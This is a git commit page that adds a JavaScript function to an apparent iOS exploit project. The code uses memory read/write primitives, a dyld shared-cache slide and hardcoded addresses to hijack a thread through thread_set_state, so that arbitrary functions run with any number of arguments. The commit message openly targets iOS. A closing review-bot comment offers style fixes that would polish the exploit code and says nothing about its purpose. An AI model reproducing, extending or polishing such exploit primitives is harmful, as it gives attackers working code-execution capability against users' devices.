| author | spv420 <unomilliono@gmail.com> | 2022-04-24 05:57:07 -0400 |
|---|---|---|
| committer | spv420 <unomilliono@gmail.com> | 2022-04-24 05:57:07 -0400 |
| commit | eab6e28c9e1b541c505e84ab64a148d6def984c9 (patch) | |
| tree | 8df4adfd893cfa14755b7f158817148bed94c79b /src/js/primitives/call.js | |
| parent | 36dd71290d6a4b7757adb9bbe59f876ada4cc6b8 (diff) | |
get rekt ios - as many fucking args as you want (need to work on return still, it'll run in a separate thread rn async)
Diffstat (limited to 'src/js/primitives/call.js')
| -rw-r--r-- | src/js/primitives/call.js | 60 |
1 files changed, 60 insertions, 0 deletions
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 996f5a8..687e758 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -97,3 +97,63 @@ function calls4arg(sym, r0, r1, r2, r3) {
 }
 return call4arg(addy, r0, r1, r2, r3);
 }
+
+function callnarg() {
+ if (arguments.length < 1) {
+ return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
+ }
+
+ mytask = 0;
+ count = 0x130000;
+ th = 0x130100;
+// thread_state_ptr = 0x130008;
+ thread_state = 0x130200;
+ countptr = 0x131000;
+ thptr = 0x131004;
+ thread_stateptr = 0x131008;
+ thread = 0x130300;
+ threadptr = 0x132300;
+ threadptrptr = 0x133300;
+
+ countptrptr = 0x132000;
+ thptrptr = 0x132004;
+ thread_stateptrptr = 0x132008;
+
+ var stack_shit = 0x161000;
+
+ write_u32(countptr, count);
+ write_u32(thptr, th);
+ write_u32(threadptr, thread);
+ write_u32(thread_stateptr, thread_state);
+
+ write_u32(countptrptr, countptr);
+ write_u32(thptrptr, thptr);
+ write_u32(threadptrptr, threadptr);
+ write_u32(thread_stateptrptr, thread_stateptr);
+
+ var addy = arguments[0];
+
+ var dyld_shc_slide = get_dyld_shc_slide();
+
+ write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide);
+
+ calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0);
+ var thread = read_u32(threadptr);
+ write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+
+ for (var i = 1; i < arguments.length; i++) {
+ if (i <= 4) {
+ write_u32(thread_state + ((i - 1) << 2), arguments[i]);
+ } else {
+ write_u32(stack_shit + ((i - 5) << 2), arguments[i]);
+ }
+ }
+
+ write_u32(thread_state + (13 << 2), stack_shit);
+ write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide);
+ write_u32(thread_state + (15 << 2), addy);
+ write_u32(thread_state + (16 << 2), 0x40000020);
+
+ calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
+ calls4arg("thread_resume", read_u32(th), 0, 0, 0);
+}
\ No newline at end of file |
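Review bot: The scratch-address assignments at the top of `callnarg` (`mytask`, `count`, `th`, `thread_state`, `countptr`, `thptr`, `thread_stateptr`, `threadptr`, `threadptrptr`, `countptrptr`, `thptrptr`, `thread_stateptrptr`) have no `var`, so they become implicit globals that leak out of the function and collide with any same-named variable elsewhere in the file (and would throw under strict mode). `thread` is the odd one out: the later `var thread = read_u32(threadptr);` is hoisted, so `thread = 0x130300;` silently writes a function-local rather than a global, which makes the scoping inconsistent across otherwise parallel lines; declaring every one of these with `var` (or one comma-free `var` per name) makes the scoping uniform. `mytask` is assigned and never read and can be dropped. Since the commit message says the return value is not handled yet, I would put that limitation on the function itself, e.g. `// NOTE: no return value yet — the call runs asynchronously on its own thread`, so a caller reading `call.js` alone is not surprised that `callnarg` yields nothing while `calls4arg` returns a result.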
